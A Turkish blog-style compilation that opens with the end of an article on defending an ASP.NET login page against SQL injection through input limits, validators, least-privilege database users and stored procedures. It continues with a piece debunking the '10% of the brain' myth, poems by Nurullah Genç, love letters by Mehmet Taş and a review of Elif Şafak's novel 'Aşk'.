Yukarıda makalenin ilk başında bahsettiğim 5 temel prensibin hepsi bu login işleminde uygulandı. TextBox nesnelerine girilebilecek max karakter sayısının kısıtlanması ile çalışabileck Sql deyimleri girilemez. Aynı şekilde RegularExpressionValidator ifadeleri ile özel karakterlerin girilmesi önlenlenmiş oldu. Yine ConnectionString ifademizde benim yarattığım bir kullanıcı ile bağlanılıyor. Bu kullanıcıya sadece StoredProcedure’leri çalıştırılmasına izin veriliyor. Böylece başka herhangi bir sql komutunun çalışmasına olanak tanınmıyor. Çünkü veritabanına bağlanan kullanıcının yapabildikleri kısıtlanmıştır. SqlCommandType’in özelliği Stored Procedure olarak ayarlanmış ve böylece dinamik SQL ifadelerinin kullanılması engellenmiş olur. Stored Procedure’e aktarılan parametrelerde şifrelenerek veritabanında, şifrelenmiş olarak duran kayıtlarla karşılaştırlır.

Elbette web uygulamasının içerisinde, login sayfasından farklı sayfalarda yer alan TextBox nesneleri ile kötü niyetli kullanıcılar veritabanımıza dolayısıyla web uygulamamıza zarar verebilirler. Örneğin, herkesin bildiği site içerisinde arama yapabilmemizi sağlayan TextBox nesnelerine girilen değerlerde kontrol edilmelidir.

Bu makalenin içerisinde yer alan kodları daha iyi anlayabilmek için, makale içinde geçen bazı konuları (FormsAuthentication, Verileri Şifreleme, RegularExpressionValidator, Stored Procedure) yine aspnedir.com sitesinden okumanızı tavsiye ederim.

Beynimizin Yalnızca % 10’unu Kullandığımız Söylencesi
Öncelikle sorunuzun başında belirttiğiniz varsayıma göz atalım isterseniz: “Beynimizin çok düşük bir yüzdesini kullanırız.” Yaklaşık bir asır önce ortaya atılan bu iddianın kaynağı bazı bilim insanlarının söylem ve bulgularının yanlış yorumlanıp çarpıtılmasına dayanıyor. Bugün, sinir bilim ve beyin görüntüleme tekniklerindeki gelişmeler öyle gösteriyor ki, beynimizdeki tüm sinirler çeşitli eylemler sırasında aktive oluyor. Daha açık bir deyişle, kullanmadığımız herhangi bir sinir ağı bulunmuyor. Konuyla ilgili bir başka yaklaşımsa sinir hücrelerinin herhangi bir uyarıcı almadıklarında dejenere olarak işlevselliklerini kaybediyor olma özellikleri. Örneğin, görsel sistem. Gelişmenin erken dönemlerinde göz sinirleri yeterli uyarıcıya maruz bırakılmadıklarında görme yetisi kayboluyor. Benzer şekilde, eğer ki beynimizde kullanılmayan sinir ağları bulunsaydı, işlevselliklerini kaybetmiş olmalarını beklememiz gerekirdi. Fizyolojik kanıtlar bir yana, iddia evrimle de uyuşmuyor. Aktif olmayan, hayatta kalma mücadelemize katılmayan sinir ağları içeren büyük bir beyin evrimsel gelişimle de bağdaşmıyor.

ANCAK

Olgun haldeki sinir hücrelerinin (yani bilgi depolayan nöronların) kendi kendilerini yenileyebilme özelliklerini yitirmiş olmaları gibi bir durum söz konusu. Bu nedenle de, herhangi bir darbe ya da yaşlanma sonucu kaybedilen sinirler beyin kapasitesini doğal olarak olumsuz yönde etkiliyor.

Beyindeki Sinir Hücreleri Gerçekten de Kendilerini Yenileme Yetisinden Yoksun mu?
Beyindeki sinir hücrelerinin kendilerini yenileyebilme yetisinden yoksun olduklarını gösteren çalışmaların öncüsü 1960’larda yaptığı çalışmalarla ismini duyuran bir sinir bilimci: Dr. Pasko Rakic. Nitekim felç ya da diğer beyin zedelenmelerinde hastaların kaybettikleri konuşma ve yürüme gibi yetileri daha sonradan tekrar edinememeleri de bu bulguları destekler nitelikte. Ancak başlangıcı 1965 yılında sıçanlar üzerinde yapılan deneylere dayanan ve son yıllarda hız kazanan bir takım çalışmalar, beyindeki bazı bölgelerde sinir hücrelerinin yenilenebildiğini gösteriyor. Özellikle de belleksel işlevleri olan hippokampüs bölgesi ile makaklar üzerinde çalışılan üst düzey bilişsel işlemlerden sorumlu ve evrimsel gelişimde son sırada yer alan düşünme, koklama ve duyma ile ilişkili korteks bölgelerinin kök hücreler sayesinde sinirsel yönden yenilenebildikleri bulgular arasında. Ancak bilim insanları, bu çalışma sonuçlarının Alzheimer ya da Parkinson gibi sinir hücreleri kaybı içeren bir takım hastalıkların tedavisinde kullanılabilmesi için klinik ve uygulamaya yönelik daha çok çalışma yapılması gerektiğini söylüyorlar.

Gelelim Sentrozomlarla Sinir Hücreleri Arasındaki İlişkiye…
Sinir hücresinin başka bir hücre üretme olasılığının kalmadığı gelişim aşamasında sentrozoma rastlanmıyor. Her ne kadar bazı araştırmacılar, yaralanmaların olduğu birtakım yetişkin beyni bölgelerinde sentrozoma rastlamış olduklarını rapor etmişlerse de sonraki araştırmalar bu bulguları pek de kanıtlar nitelikte değil. Sinir hücreleri, gelişim dönemleri içerisinde özelleştikçe, çoğalma yetilerini de kaybediyorlar. Bölünme yetisinin yitiminin, meydana gelebilecek bölünmelerin, mevcut sinaps ağlarının da bozulmasına yol açabileceğinden evrilmiş olabileceği düşünülüyor.

Sinir Hücrelerinde Sentrozom Görevi Görebilecek Bir Yapı Oluşturulursa, Kendilerini Yenileyebilme Özelliğini Edinebilirler mi?
Eğer ki sinir hücrelerine böyle bir müdahalede bulunacak olursak, tekrar bölünebilme özelliği kazanacaklardır. Ancak uzmanlar, bu yöntemin tıp uygulamalarında niçin kullanılamayacağına dair iki önemli noktaya işaret ediyorlar:
1.) Eğer ki, sentrozom yapısını kaybetmiş bir hücrede bu yapıyı tekrar oluşturursak, hücre kontrolsüzce çoğalmaya başlıyor. Tıpkı kanser hücreleri gibi. Bu nedenle de bu uygulama, tümör oluşumlarına yol açıyor.
2.) Eğer ki, sentrozom yapısı yalnızca embriyonal dönemde korunan hücrelerde (örneğin, sinir hücreleri) bu yapı müdahale ile sürekli hale getirilirse, hücreler özelleşme durumu göstermiyorlar. Çünkü hücrelerdeki özelleşme, sentrozom yapısının kaybından sonra gerçekleşiyor.

Kaynak : Tübitak – İnci Ayhan

Kopardın

Bir hicran çölüne bıraktın beni
Kalbine girdiğim yolu kopardın
Yaydın üzerime yalan gölgeni
Adını andığı dili kopardın

İçimden boşluğa savruldu külün
Hüznün ateşiyle yandı kakülün
Yıllardır ruhumda öten bülbülün
Her seher konduğu dalı kopardın

Uzattıkça sana boş ellerimi
Birer birer yıktın hayallerimi
Bilmem, ölü müyüm, yoksa diri mi
Saçımdan sn siyah teli kopardın

Gönlümde aşkınla hergün yeşeren
Göğü yıldız yıldız önüme seren
O güzel, bembeyaz gülü kopardın
Aynasında yalnız seni gösteren

Nurullah Genç

Yakılacak Mektuplar 24

Varlığında can bulduğum merhaba. Yine can çekişiyor aydınlıklar. Gece devralmaya başladı nöbetini. İnce bir sızı gibi girdi sensizlik her gece biraz daha yabancılaşan odama. Duvarlara anlattığım öykülerde hep sen oluyorsun. Sen oluyorsun rüyalarımda yalnızlığımı paylaşan. Yıldızlara okuduğum şiirler birer birer göktaşı olup dökülmeye başladılar. Belli ki çekemez oldu gökyüzü hasretin bunca ağırlığını. Susuzluğumdan gayrı sıkıntım yok şimdilerde. Susuzluğumsa hepten senden yana.

Sayılı günler tez geçer diyorlar ya, yalanmış teselliye varan bu sözler. Geçmiyor, geçmiyor takvimlerin hoyratlığı

Sensizlik tez geçsin diye dilekler diliyorum. Mum yakmak bana göre değil biliyorsun. Ondandır yatırlara gitmeyişim. Ağaçlara çaput bağlayıp, gözyaşımı kristal şişelerde saklamayışım ondan.

Dertler paylaşıldıkça azalırmış. Paylaşmak istemeyişim senden gelen dertlere aşina oluşumdandır.

Yine paylaşıldı varlığı alemin. Tapu kayıtlarına düşmedi adımız. Tamı tamına hasretin kaldı bana. Bir sen, bir ben, bir de senden kalan ince bir sızı…

Var olasın ey sevgili.

Mehmet Taş

Yakılacak Metuplar 31

Bıktım sabahı olmayan gecelerin soğuk yüzünü seyretmekten. Bıktım, boş duvarların arsız sırıtışlarından, kaş çatışlarından. Umut ekmekten, hüzün biçmekten bıktım.

Gidişin soğuk bir kış gecesiydi. Buz kesilmişti kaldırımlar, buz kesilmişti bedenim. O zaman biliyordum dönmeyeceğini. O zaman biliyordum bütün yolların çıkmaza uzandığını. Ama bir umut, kücüçük de olsa bir umut kalsın içimde istemiştim. Kaldı mı sence.?

Bir haber yollayacaktın, bir selam, bir mektup, ya da geri döneceğin umudu saklayan bir işaret. Hani nerede?

Zaman, çok acımasız. Her derde ilaç derlerdi de inanırdım. Zaman ilaç değilmiş derdime. Bir yok oluşun, kahroluşun takvimlerdeki yansımasıymış zaman.

Uzun gecelerde sana şiirler yazardım. Kelimelere hece hece sevda yükler de yıldızların ürkek titreyişlerinde sana yollardım. Şimdi ne şiir yazıyorum, ne de yıldızları seyrediyorum. Yok artık kelimelerin eski gücü, yok yıldızların ürkek titreyişi. Yok, yok, yok. Sen yoksun ya, yaşamak için sebep yok.

Gittin. Bir koyu yalnızlığa mahkûm ettin beni.

Gittin, sıyrıldım dünya nimetlerinden. Bir berduş, bir ayyaş, bir dilenciyim şimdi sevda şehrinin soğuk kaldırımlarında.

Üşüyorum canparem,

Yalnızım canparem

Korkuyorum canparem.

Sen gelmesen de bir selam, bir mektup, bir haber de mi yollayamazsın.

Ölüyorum canparem.

Mehmet Taş

Aynı kitapta bir Bağdat, bir Semerkand, bir Boston geziniyordum. Farklı karakterlerin dillerinden yazılar dinliyordum. Şems’in kırk kuralı, gönlü geniş ve ruhu gezgin sufi meşreplilerin kırk kuralı, kırk hakikati ve insana aşkın bile bile yanmak olduğunu, aşkın ilahi, insani ya da başka bir şey için değil başlı başına bir dünya oluşundan bahsedişini… Etkilenmemek elde değildi.
- ”Aşksız geçen bir ömür beyhude yaşanmıştır.”
Diyordu Şems. Birçok fikrim vardı aşkla ilgili ama hep en üzücü olanı, aşkın acı verdiğini düşünürdüm. Bu yönden kitap bakış açımı oldukça değiştirdi. Şems’in ucunda ölüm olduğunu bilerek Konya’ya gelmesi, Ella’nın her şeyi bırakıp Amerika’dan ayrılıp aşk uğruna bilmediği bir memlekete gitmesi üstelik âşık olduğu adamın az ömrü kaldığını bildiği halde yinede her şeyden vazgeçmesi. Etkilenmemek elde değildi.
- “Tasavvuf seni senden alır, seni sana sensiz verir”
Beni benden aldılar… Kitap arşivlik bitirip yeniden aynı heyecanla okunacak kadar başarılı. Bende özü yakalamama sebep oldu, kendimi keşfettim ve aşktan kaçmak yerine aşkı aramaya karar verdim.
Âşıkların şeriatı da Allah’tır, mezhebi de…

Kaynak: http://www.renklidergi.com/kultur-sanat/kitap/Elif-Safak-Ask

ben bir aziz değilim
hele gündüz değilim
attığı her adımda siyah bir iz bırakan
bir yanında ürküten bir baldıran gövdesi
bir yanımda kederi özümleyen bir lale
merhamet sahrasının uyuyan gecesiyim
bırakta böyle bitsin bu günahkar serüven
bırakta kurtarayım bu emanet sarayı
yeter intiharınla oyduğun yüreğimi
umutsuz şarkılarla avutulduğun yeter

göğsümde bir yanardağ kıvranıyor rüveyda
yaraları kapandıkça kanıyor rüveyda
duman çöktü güneşin sitem aynalarına
aralandı perdeler şimdi sensiz değilim
dertliyim, viraneyim, ben bir aziz değilim
azizler tohum eker sevgi tarlalarına

senin gözlerin dram, oysa ağlatan benim
ben dilenci, sen sultan sevgi dağıtan benim
sen ışık ben karanlık ve aydınlatan benim
ben ölümüm sen hayat cana can katan benim
sabah sende oluyor güneşi tutan benim
soran ben sorulan sen hüznü damıtan benim
öldüren ben ölen sen kabirde yatan benim
sen, sevda yüklü bulut, göklerimin sahibi
saklıyorum içimde seni bir tufan gibi

nerde uğruna ömür verdiğim bela, nerde
her hatıra bir demet zakkum meyhanelerde
düşlerim esrsrınla çoğalan pervanedir
götür benden ahzanı bana, ihsanı getir
yalanı reddederken düşüyorum yalana
ben bir aziz değilim rüveyda anlasana

bu ağıdı öldüğün için söylemiyorum
sen ölmedin rüveyda
at vuruldu ben öldüm
her hamlesi bir tabut şimdi bakışlarının
yıkayıp kefenledim mehtabına gömüldüm
duysun alem ateşin dağı erittiğini
bu illetin daşları bile çürüttüğünü

gün olurda ayrılık yumağı çözülürmü
bergüzarım ayaklar altında ezilirmi
rüveyda görürmüyüm yeşil ufuklarını
seninle bir sonsuzluk bulurmuyum rüveyda
yoksa hep bu kabirde kalır mıyım rüveyda

(13.02.2001-İstanbul)
Nurullah Genç